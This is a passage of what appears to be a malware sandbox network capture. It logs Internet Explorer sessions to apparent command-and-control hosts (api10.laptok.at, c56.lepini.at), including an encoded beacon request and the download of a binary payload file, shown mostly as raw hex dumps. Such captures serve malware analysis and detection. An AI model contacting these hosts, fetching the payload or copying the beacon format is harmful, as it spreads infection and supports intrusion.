a6 64 41 14 51 c6 3b db a6 f7 28 21 67 6d 0a 1e ae ef f7 f0 cb 21 2a eb 88 6d ea 96 b9 6b 1c 33 e3 ad e8 5e 10 85 50 33 e2 b7 37 bf 25 1f b2 2e 16 fa 4b 05 6f b7 25 01 e7 bb 5d 47 a7 08 1b ea f4 2a 21 91 00 56 3f 19 17 7f e4 1b 32 16 64 ce 8c e5 a3 80 4e 42 95 ec 41 17 c1 79 41 78 39 5f b8 00 e5 f1 85 25 c4 00 22 05 28 48 86 e4 3b 36 7d a9 ee fd c3 b2 2a 59 81 f0 58 0e 2b d4 b1 2c 39 b1 b8 14 1b e1 0b e5 93 19 90 f2 86 ed 75 aa c7 96 ef 32 d5 a9 07 71 07 83 ed 7e 84 7b b5 0a 43 15 e0 41 3d 30 5c 93 92 78 35 ed 01 59 d1 6a e9 9d 3a 23 f2 df 07 aa a1 21 41 eb 00 72 e7 d9 83 61 45 1d a2 35 0f 35 d1 e6 bc Data Ascii: 2000zPF(Kp!Kp?[17+h&eUKppXXiA@lO)Fn:Gu1m_0sI@z?42;{J(QxK)<X)of9X"#`61eZ:SHZ0qT=d6ouC n7 EajW"hF9+zxX/Svhigi\|+77+U]IR1/\|R'R2XVFzp],TAwC:7pT0aKnS~Obw"fjcms-{FUr,{Og96\gXQJq$9;b3akHDP0P?$h!Mz#5K9a#nB1wrLqFg/2rzb{`}`o;3B6gmz@~lh&gk0 Hi>k677D\jsbMN:aRG&\|9>+g`>9;rE}KTz-n{C=!!l"bxJd =cZ$<DLF* si}dxpb)z<dCEuKl1/$z)Y+Zy=AdAQ;(!gm!mk3^P37%.Ko%]G!V?2dNBAyAx9_%"(H;6}*YX+,9u2q~{CA=0\x5Yj:#!AraE55
Feb 12, 2021 18:45:15.759696007 CET	5547	IN	Data Raw: 84 17 f4 df 16 1f db 93 1a 2d b0 ed 95 2f 43 dd 86 36 c3 8f 2c fd af a1 07 95 4a af 38 6a 58 d1 b7 5a 35 a5 6d aa 62 db bd 4f ad 33 f2 43 7e 76 32 bd a0 0a fa 9d c6 e0 e7 bf ab 43 50 df 9f 9c 3e 12 af 6e 32 5c 64 c7 39 d1 97 ad a7 3f e3 37 47 3a Data Ascii: -/C6,J8jXZ5mbO3C~v2CP>n2\d9?7G:OX!y=dot-E"NmZ1<NZ>k'O">z3@ \6H#}O!pn"\"DgxcH)>Dz$wCH.E
Feb 12, 2021 18:45:15.759737968 CET	5548	IN	Data Raw: 84 11 57 7c 42 21 64 da a4 47 59 85 ea 01 05 9c aa fd d8 5e 64 c8 d2 82 55 72 ff 81 22 52 ff f6 26 7a b1 f2 bd 53 e1 67 9d d3 62 27 e5 c4 da 4e ce e1 a7 74 68 93 e8 ee 0b 81 b8 f5 fc e1 f9 85 87 e9 4a 32 85 fd 4c b7 67 8f aa 49 08 9a f8 c1 b7 f9 Data Ascii: W\|B!dGY^dUr"R&zSgb'NthJ2LgItoNBt7aq9<2&2t_KorC5k+Q%5h9B(8^x!NM,E,g`==9zYf(48Sw\|MyHZV.@8Q%>$1.
Feb 12, 2021 18:45:15.759777069 CET	5549	IN	Data Raw: 13 07 1b 5a da d5 1a cb 03 a4 9c 80 81 2d f4 f2 86 28 84 16 59 6a a2 af c6 f4 30 6e 4c 5b c5 c8 ba 96 af d1 3b 3d 1a 23 c4 ba 0c 67 60 26 74 30 dc 76 0b 11 b5 05 7d 1e 19 70 1f b3 d0 e8 2b 6a 18 67 67 47 61 b3 b4 ae 6f 66 b3 46 84 c8 94 3f 66 b4 Data Ascii: Z-(Yj0nL[;=#g`&t0v}p+jggGaofF?fL$=OU.S>8cq#jdbGs$3Iwm;}kwB4I}#$MDG-CGqv]Mz7:@R2oR\|P]8=[_Nd~H7:@u=M2
Feb 12, 2021 18:45:15.759815931 CET	5551	IN	Data Raw: bb a6 bc eb ac 2e e5 16 e7 e1 5c 4b 85 ea d4 b2 55 74 93 b8 91 8a 06 65 5f 84 83 1b d4 73 00 36 83 dd cd 81 ce 5a 11 c5 96 35 a3 92 3b 90 81 3d 51 c6 7d ef 09 19 2b 1d 0c 02 d7 f9 09 9e ce 55 f5 b9 76 c5 7e 02 b8 9d 9b b4 f1 08 d5 ae 9f 63 d4 8a Data Ascii: .\KUte_s6Z5;=Q}+Uv~cXcL}W' xwU"'ITi?;IhRFJlf~Fh*bTKf3q~NR]D-8f!F&Q?yF4rUs^H7l2pUyW6S;q)=
Feb 12, 2021 18:45:15.759865046 CET	5552	IN	Data Raw: f8 8b f0 a4 64 22 aa c9 9e e4 63 4f 27 7e 15 78 21 ff e8 50 ef da 76 94 2b 6c 4c f6 e9 6f 74 4f d5 be e2 00 51 48 26 66 f1 7a 61 ab 48 31 47 0e 71 cb 9b 6b 89 f6 51 7e 9c c9 5d d1 af f7 2b 9a 94 ad c9 fb 64 80 d0 d2 b1 9c 28 84 c0 73 db f7 8b 35 Data Ascii: d"cO'~x!Pv+lLotOQH&fzaH1GqkQ~]+d(s5pK+A/@A:S :p27$ALXc^Cr=x,"vr;o`Qj49C )hP2)B1+3W%,&#lv,\!\|X$Ih
Feb 12, 2021 18:45:15.800854921 CET	5554	IN	Data Raw: 0c f5 e2 d6 0a 0c e6 f6 7b c8 bd 22 f8 37 dd 18 39 c8 7e 9e da 61 dc 6e 90 26 ec d1 ac 7e b6 4f 11 06 d1 fd 0c 61 7a ca fc 55 82 9f 9b 01 9c 0b 11 43 83 e5 76 a7 4d 5e fe 2b a0 3d 6c 7b c2 b7 91 03 c8 9a 2e b2 f9 43 16 59 4b 42 57 05 b1 0f 97 a9 Data Ascii: {"79~an&~OazUCvM^+=l{.CYKBW"_I^@O9BC Nw\|UU {09(LT9o2HJahtrq9f?K10XHq7$?G@6'YFcU70KnteJ:;^+%x?~R/?
Feb 12, 2021 18:45:15.800915003 CET	5555	IN	Data Raw: a2 10 8d 6f b8 90 37 35 13 8b 42 b7 70 cf 7f 1c 42 b3 e0 9f 26 28 c2 ac 42 3f 63 b2 50 ba 8b 5b 90 ea 34 5c a3 3c 1d f9 c8 2e ad 34 77 05 c5 06 22 5e 52 51 67 ab 4f 32 8e 6e 5a 6a 85 56 32 50 bf 1d 80 a4 08 6b e6 84 d7 ed 0c 2f ff 98 de b1 a1 e6 Data Ascii: o75BpB&(B?cP[4\<.4w"^RQgO2nZjV2Pk/RcQ(r!_~c[G#V'['6>d'\|fS:Mn}E\ne=&,"*\|tSQ]0xEI\~v8ems6W1fX<L}\|'<vhJj^N
Feb 12, 2021 18:45:15.800954103 CET	5556	IN	Data Raw: 4d a4 4b b0 5a b7 f3 7d b9 9d ab 2a 62 f4 05 e2 96 c5 f9 ff 4b b4 c3 a3 7a 93 d6 eb 0b a3 59 de b3 5b fb a7 5d 86 e0 c9 dc 38 8a 7c 17 f0 35 52 f6 90 77 89 5f 52 f0 e7 b7 8f 85 53 56 20 4c e2 aa 9e 3d fa 8a d4 35 1f 6f f6 68 b0 62 16 44 a7 4d 0e Data Ascii: MKZ}bKzY[]8\|5Rw_RSV L=5ohbDM\|Z?oc!xg!gSg;6E1-vK5M98=g{K8E{+m0rIP+/HksvFFT~A>"!\m=4JCgTz-
Feb 12, 2021 18:45:15.800992012 CET	5558	IN	Data Raw: 70 ee 5d 80 29 b7 a4 05 0a de 5f 87 52 d8 e4 5d 50 5f 3f 27 81 63 75 59 87 5a f8 6e 11 7a 17 1f 3c cc a2 d6 91 f4 56 aa 96 d3 7f a3 f8 fe e4 71 eb 8f 69 14 6e bf b7 72 a7 1c 00 b2 2d 29 f7 85 11 f7 34 d3 d2 e9 a1 4b a1 07 7b 5c 4f ea 2f e6 82 e3 Data Ascii: p])_R]P_?'cuYZnz<Vqinr-)4K{\O/y.""07>#}-X34Nsj$~i`X~0tE1Cu "Tu'.\ImTHG%qB8)
Feb 12, 2021 18:45:15.836739063 CET	5559	IN	Data Raw: 83 0a 12 5f ce d1 d8 c9 1e 45 85 3d 05 01 31 d0 2d f0 1f 5f 56 96 e5 68 f0 47 85 07 9c 96 ee 3b 02 9e 82 6e 72 e3 b9 09 9a bc 6e a9 a9 33 96 c1 2d ab bf ac c9 c0 3a f7 0d c3 fe 27 e5 cb 55 d7 03 1b be e6 97 32 aa 63 57 9d 01 a7 a6 c8 90 aa 82 18 Data Ascii: _E=1-_VhG;nrn3-:'U2cWHp3xi4@Y k7`hgY"&K^q07/`~s3q36r6__{=(h2}#ybxT0rG4n;"<u`;c_:F}Cr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49751	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 18:45:16.317478895 CET	5817	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 18:45:16.405004025 CET	5817	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 12 Feb 2021 17:45:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49754	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 18:45:18.448458910 CET	5819	OUT	GET /api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0dYaBh2VTFZ3ie/AQvPNAeKAbUpEx_2BIA_2F/yqBcCuGKcxWU4/7_2FDUSL/tmEKyuvK3UnsOb7GxJhyB1v/eAgP5jhU7c/4LQdBuTq0iBob66eg/RKZ75u7U2Jkq/Bh_2B1mS8Vw/lDNXKg1S3Gc5QV/zwawyAQoh3ycAGCJJd6YY/crMtievOTWbq6IjA/LAnATbCyag_2Bwn/5yU0_2BoSAkzUKbcl_/2BAXWx8K4/WLBZv2PnGv5crOgJCyib/ZVr6kC0SezCKLbzs2jt/2ZOSFMw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 18:45:18.800822020 CET	5821	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 17:45:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 36 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 94 35 b2 ad 00 00 43 17 44 81 5b f1 0b e0 e2 ee d2 e1 ee ce ea ff eb 33 93 49 ce 24 af 04 77 c5 49 30 a8 12 a5 a8 b6 a2 5f 8b 54 b2 76 d5 66 ff 0d 57 1e 19 f4 a9 6d 4f b3 8e 5d 45 3e 09 2d 0c e2 b5 e8 b3 78 a7 0e 77 9b 12 07 06 8a 34 67 0b 51 e1 e3 63 ff d2 ba 88 2a d0 67 de 7e 35 cb 0f 69 99 96 72 61 db 7b 64 dc e9 f2 d6 a6 75 f4 53 a0 da 04 4e 16 a0 fc 4e ed c7 26 8a 5a ea 13 9a 6e ed 08 0b 7c cc 3a 04 f3 0e 55 97 6e e6 ab 00 c3 c8 6a 3e 3d 02 cc c5 94 d7 1a 93 3d c4 4d 8c 9d e5 36 2c 6b 04 b0 a2 35 67 c4 32 d5 e1 dd e7 70 62 be a2 0e 18 bc 38 ba ab b1 7a 36 52 97 d5 24 07 50 19 12 89 13 47 0d 36 af 5b bb fa cd cb b8 0a f6 31 6f c5 40 c9 03 8d 2d 41 90 b6 41 4f ad da 6b 65 9e 25 e9 71 cd af da a4 99 20 88 95 3c 3c 66 1c 12 d8 9f 8e cd 93 47 d0 b6 47 a6 5b 04 6f 4d d2 8b 2f cf c7 e4 84 5d 76 cd cc af 49 1e d7 6c b8 90 2b 8d 5d a1 d9 c6 fa dd 05 61 75 4a 98 d3 fd 73 72 8d 75 74 4f fa 17 62 27 63 f7 72 0f 18 74 fd 12 89 50 ca 7f 95 5e cd b5 30 ed 73 02 4d ec 8d 0e fd 6a 8f 0f da 19 f4 c1 29 eb 63 52 47 f1 ce 75 99 1f a8 ab b7 5d e0 01 7b 63 e8 a3 2a 8a 29 e0 2c ab fb a8 d5 b7 a0 1b 15 fd a7 ad 41 18 48 22 e2 d4 38 f9 9c 35 fc 68 a4 a6 73 e4 17 a6 16 e5 90 0a 7c e9 12 c4 d4 42 af 20 53 e5 0d 82 c1 75 23 a0 da 29 78 00 6c 96 a6 b6 f0 b2 79 50 06 8b 8d 2e 02 32 5d 59 db de 2a 32 51 3b 0f f5 98 d5 90 e7 2c 7f 06 f2 ea 77 56 4b 3d 0a a4 93 d9 56 ad c5 34 a9 de 9d 38 55 c9 0a 16 a6 fe 75 f3 6e 90 f4 ec 0d 36 62 44 46 cb c3 58 ac 57 f0 99 73 4d da be 94 43 fe b3 08 9c 2e e9 a7 a1 d7 81 0c 6a ef e0 04 38 67 b6 ca 8b 92 ac e9 da 9e da 9b 01 31 84 4c e0 20 e9 ea c0 df 5e a6 72 73 1b a0 2f 9d 2e cc ce 52 45 79 86 4d b4 30 84 ce c2 4a ee a4 ba b5 15 ce f4 61 a3 d3 79 43 24 bf 0f 43 7c ff c0 cc 2b 95 da dc cb 22 a5 92 42 4d 22 3a 81 36 29 0b 65 c7 aa 04 c9 2a 2b b0 64 0f 11 06 cc ba 7e be df 28 6e 54 a5 32 6c 65 68 e7 f9 07 6e 08 80 ea 46 14 a1 19 01 c9 3c 88 40 2b b0 05 d6 aa 94 1b 6a a7 ab ce e4 84 d8 5c be ce df 6d 1c 47 d8 88 00 c1 81 61 93 7c dc 1d c0 25 b1 8a 12 5c 2b af c4 07 a2 d2 d9 6f 70 2d ff 42 85 e4 9f 43 10 83 a9 d9 91 44 72 12 00 65 f4 0f f9 5b c1 46 b7 42 8c 2c 85 17 d5 a5 c2 60 d0 68 fa 83 d4 c6 c5 a4 05 25 0a aa c0 bc 66 ae 9b d3 f8 8b 2e c1 d9 f3 88 fe cb 5e 25 25 e6 3b 24 51 9d e8 57 11 cc 97 43 ed 62 f3 e7 14 a5 ed 3a 78 b9 0b 64 e9 9a 69 a9 ac 80 4c fb d4 7a 6c 4d bf a6 fe a8 be 6d 94 af 0e 84 13 96 c0 1f 95 3f 35 51 33 8d bf 4e 40 d7 d6 a8 5a d1 a6 ab 93 ac af 5d ed 9c 3b 0a f3 1b f8 9e 05 c0 5a 81 8e 5f a3 ff 42 38 c4 15 8e f4 c5 f4 84 12 a3 0f ae 1c 79 5f 55 04 71 ab 16 86 04 b5 26 45 c1 1e f1 0c d3 6d 93 da 34 92 07 29 0f 7d f3 b1 f0 42 0c 74 23 e1 07 09 aa 17 e3 3a 76 23 0c 27 41 95 44 1b cc c0 6c b1 67 1c 49 a3 fd 27 48 25 64 b9 21 aa 4b a5 07 b1 fe ca 41 9c 84 f4 bd 6d 51 c8 04 17 f0 51 73 39 51 2e 39 77 0f 2b f9 78 55 85 fe 06 3a 57 c8 b2 aa 51 1a bf b1 b6 f5 9c 21 0b fe 10 47 5d 37 d1 ca a3 c0 65 27 b8 4c 75 4f d1 c8 ac f3 9c 92 f6 09 86 93 59 48 bc 93 36 32 ab 8a de 24 16 3a fa cb 81 c4 5f 96 b7 ed f2 18 89 8f d0 9a 35 54 d6 57 2c 56 60 5c 98 bf 0e 12 af d4 7d 88 2e 5b 63 f9 c6 20 c6 93 Data Ascii: 76c5CD[3I$wI0_TvfWmO]E>-xw4gQcg~5ira{duSNN&Zn\|:Unj>==M6,k5g2pb8z6R$PG6[1o@-AAOke%q <<fGG[oM/]vIl+]auJsrutOb'crtP^0sMj)cRGu]{c),AH"85hs\|B Su#)xlyP.2]Y2Q;,wVK=V48Uun6bDFXWsMC.j8g1L ^rs/.REyM0JayC$C\|+"BM":6)e+d~(nT2lehnF<@+j\mGa\|%\+op-BCDre[FB,`h%f.^%%;$QWCb:xdiLzlMm?5Q3N@Z];Z_B8y_Uq&Em4)}Bt#:v#'ADlgI'H%d!KAmQQs9Q.9w+xU:WQ!G]7e'LuOYH62$:_5TW,V`\}.[c
Feb 12, 2021 18:45:18.800867081 CET	5821	IN	Data Raw: e3 c3 40 bf b9 61 2d 05 15 84 20 14 ed 60 e3 f9 0c c8 a7 1c ac 63 51 f6 46 c8 6a fa 4f 8d 28 bb cf 99 6c 9e 2f 09 cf c4 a1 07 76 73 4b f1 ad 46 da 73 bb bb 31 e9 e2 b3 5c 19 7c 62 1c c0 fd a2 b7 4f 63 20 d5 57 ab 6b 1a 92 3a 8a 20 74 8c 9f e8 94 Data Ascii: @a- `cQFjO(l/vsKFs1\\|bOc Wk: tdE((l}-+RJ{;eGaOw)(QTrV=n)1<JJgcmV$(T+",^%EniZBvm*6$^a5

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49755	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 18:45:30.231029034 CET	5822	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Feb 12, 2021 18:45:30.317939997 CET	5824	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 17:45:30 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
Feb 12, 2021 18:45:30.318002939 CET	5825	IN	Data Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8 Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8\|ymf&ASxYE6*Vfy
Feb 12, 2021 18:45:30.318042040 CET	5826	IN	Data Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1 Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)\|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
Feb 12, 2021 18:45:30.318094969 CET	5828	IN	Data Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23 Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
Feb 12, 2021 18:45:30.318136930 CET	5829	IN	Data Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4 Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
Feb 12, 2021 18:45:30.318173885 CET	5830	IN	Data Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63 Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP\|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
Feb 12, 2021 18:45:30.318214893 CET	5832	IN	Data Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1 Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
Feb 12, 2021 18:45:30.318254948 CET	5833	IN	Data Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77 Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
